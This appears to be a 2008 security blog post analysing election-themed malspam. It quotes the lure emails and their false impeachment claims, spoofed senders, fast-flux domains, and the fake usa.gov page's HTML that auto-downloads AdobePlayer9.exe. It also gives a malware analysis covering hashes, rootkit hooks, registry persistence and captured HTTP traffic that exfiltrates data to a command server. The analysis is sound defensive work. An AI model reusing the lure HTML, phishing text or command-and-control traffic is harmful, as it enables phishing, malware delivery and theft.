On 05 November 2008, Barack Obama emails began circulating that contained hyperlinks to a fake news site that offered a video of Obama’s historic win. The site attempted to fool visitors into installing an Adobe Flash update adobe_flash.exe. The executable download installs an Infostealer trojan designed to steal personal information. Sophos and McAfee provided updates on the threat.
Sample email verbiage included the following:
"From: "President election results"
Subject: A new president, a new congress...
Barack Obama Elected 44th President of United States Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5! ...... "
On 7 November 2008, it was McCain’s turn to be center stage on the malspam front. The following is a sample email with a hyperlink to fake usa.gov news website.
From: USA news [mailto:videonews@usa.gov]
Sent: Friday, November 07, 2008 10:53 AM
Subject: McCain want to stop Obama
McCain Lawyer Impeach Obama!
McCain has reached an agreement with the Obama lawyers that makes Obama resignation effective November 11.
Barack Obama can lost President's Chair.
McCain video report 7 November:
Proceed to the election results news page>> <http://productsremote.configlogin.selfservice.YwgnjIkoZ.viewcontent.privatelogin.TW76dHSS4.serensy.com/services.htm?/rnalid/siteminderagent/OSL.htm?LOGIN=TlbX8Ywgnj&VERIFY=IkoZR9TW76dHSS4> 2008 USA Government Official Web Site.
Sample malspam email subjects include:
McCain Lawyers Want to Stop Obama
Barack Obama in Danger - McCain will fight for president post
McCain Lawmakers Impeach Obama
McCain said today: 'Impeach Obama'
Obama Impeachment Resources: McCain Look at the Impeachment Process ...
Obama faces impeachment
The Impeachment of new president Obama
IMPEACH Barrack Obama | USA government news
Scandal: Obama Resignation Letter
Video: Obama post-resignation speech
Barack Obama can lost President's Chair. The President's Resignation.
Barack Obama can lost presidents chair.The President's Resignation Speech - TIME
Barack Obama president resignation - 23/7 News
Barack Obama can lost President's Chair. Political Strike at WV Mine
Barack Obama can lost President's Chair. Political Strike Confronts the Global Economy
Barack Obama can lost President's Chair.POLITICAL STRIKE TIES
McCain strike against Obama political way
Obama vs McCain 'Political Strike' May Undermine Labor Group
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Why MccAin Want to Stop Obama From president vacancy?
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
WScandal: Re-elections hich John McCain will show up to debate?
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections Why McCain Will Win
Scandal: Re-elections John McCain will defeat Barack Obama
Sample malspam email From field values include:
USA Government Center
USA news
CNN news
McCain News Center
Elections Centre
Election News
Sample malspam email From spoofed addresses include:
news@usa.gov
videonews@usa.gov
attention@usa.gov
news@usa.com
alert@usa.com
videonews@cnn.com
attention@cnn.com
news@cnn.com
alert@cnn.com
The malspam hyperlinks point to fast-fluxed hosted domains.
dieytemsn.com
poreibrsu.com
baraokl.com
serensy.com
oritrsunwart.com
The domains mapped to the following fast-flux IP addresses at the time of analysis.
IP Reverse Country
125.0.177.99 ntaich176099.aich.nt.ftth.ppp.infoweb.ne.jp JP
65.34.190.175 c-65-34-190-175.hsd1.fl.comcast.net US
75.31.240.8 adsl-75-31-240-8.dsl.chcgil.sbcglobal.net US
79.177.243.105 bzq-79-177-243-105.red.bezeqint.net IL
122.118.192.172 122-118-192-172.dynamic.hinet.net TW
The hyperlinks point to a fakeusa.gov website that advertises a McCain video and hyperlinks to get the Adobe Flash Media Player.
The site includes several methods of fooling victim’s into downloading AdobePlayer9.exe.
<meta http-equiv="REFRESH" content="10;url=../AdobePlayer9.exe">
<a href="AdobePlayer9.exe"><img border="0" src="160x41_Get_media_Player.jpg" width="160" height="41"></a>
<a href="AdobePlayer9.exe">
<img border="0" src="McCainvideo.jpg" width="582" height="402" onclick="alert1()" onMouseOver="window.status='http://media.usa.gov/downloads/McCain977855N';
return true" onMouseOut="window.status=''; return true" TARGET="_top"></a>
Malware Analysis
AdobePlayer9.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes
AdobePlayer9.exe creates C:\WINDOWS\9129837.exe
9129837.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes
9129837.exe creates C:\WINDOWS\new_drv.sys
new_drv.sys
a54de1d46ff7bdefbf9d9284c1916c5e
8,192 bytes
The following registry keys store malware identification data.
HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 50, FF, F4, 94
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: B8, 72, F7, 4E
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 2
The following registry keys install new_drv.sys as a service.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [HEX VALUES]
The following hidden registry key launches 9129837.exe at startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = C:\WINDOWS\9129837.exe
Both 9129837.exe and new_drv.sys install as a rootkit. Files, registry keys, and processes are hidden.
>SSDT State
NtEnumerateValueKey
Actual Address 0x81C1F58A
Hooked by: Unknown module filename
NtQueryDirectoryFile
Actual Address 0x81C1F6B6
Hooked by: Unknown module filename
NtQuerySystemInformation
Actual Address 0x81C1F85C
Hooked by: Unknown module filename
>Processes
!!!!!!!!!!!Hidden process: C:\WINDOWS\9129837.exe
Process Id: 596
EPROCESS Address: 0x81C9D9F8
>Files
Suspect File: C:\WINDOWS\9129837.exe Status: Hidden
Suspect File: C:\WINDOWS\new_drv.sys Status: Hidden
The malware hooks into any running process. The following example shows a hook into svchost.exe.
>Hooks
[1056]svchost.exe-->kernel32.dll-->CreateProcessA, Type: Inline - RelativeJump at address 0x77E61BBC hook handler located in [unknown_code_page]
[1056]svchost.exe-->kernel32.dll-->CreateProcessW, Type: Inline - RelativeJump at address 0x77E61B8E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump at address 0x7622B059 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExW, Type: Inline - RelativeJump at address 0x76240C8A hook handler located in [unknown_code_page]
9129837.exe listens on TCP port 13899 and runs a s a hidden process.
Process C:\WINDOWS\9129837.exe (*** hidden ***)
Protocol Local Address Foreign Address State PID PathName
TCP 0.0.0.0 : 13899 0.0.0.0 : 0 LISTENING 596 C:\WINDOWS\9129837.exe
UDP 127.0.0.1 : 1037 * : * 596 C:\WINDOWS\9129837.exe
RAW --- --- --- 596 C:\WINDOWS\9129837.exe
9129837.exe connects to 91.203.93.57 (UA) to register itself, receive instructions and exfiltrate data. The malware performs the following connections:
POST /cgi-bin/pstore.cgi
GET /cgi-bin/cmd.cgi
GET /cgi-bin/options.cgi
POST /cgi-bin/cert.cgi
POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dbe3fdbe3fdbe3f
User-Agent: IE
Host: 91.203.93.57
Content-Length: 224
Cache-Control: no-cache
----------------------------dbe3fdbe3fdbe3f
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream
Forms:
----------------------------dbe3fdbe3fdbe3f--
GET /cgi-bin/cmd.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57
GET /cgi-bin/options.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57
POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dcd05dcd05dcd05
User-Agent: IE
Host: 91.203.93.57
Content-Length: 298
Cache-Control: no-cache
----------------------------dcd05dcd05dcd05
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream
0S...0...*.H.. .......0.0;0.0...+............2........&..........N...+..\.......{....
----------------------------dcd05dcd05dcd05--
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment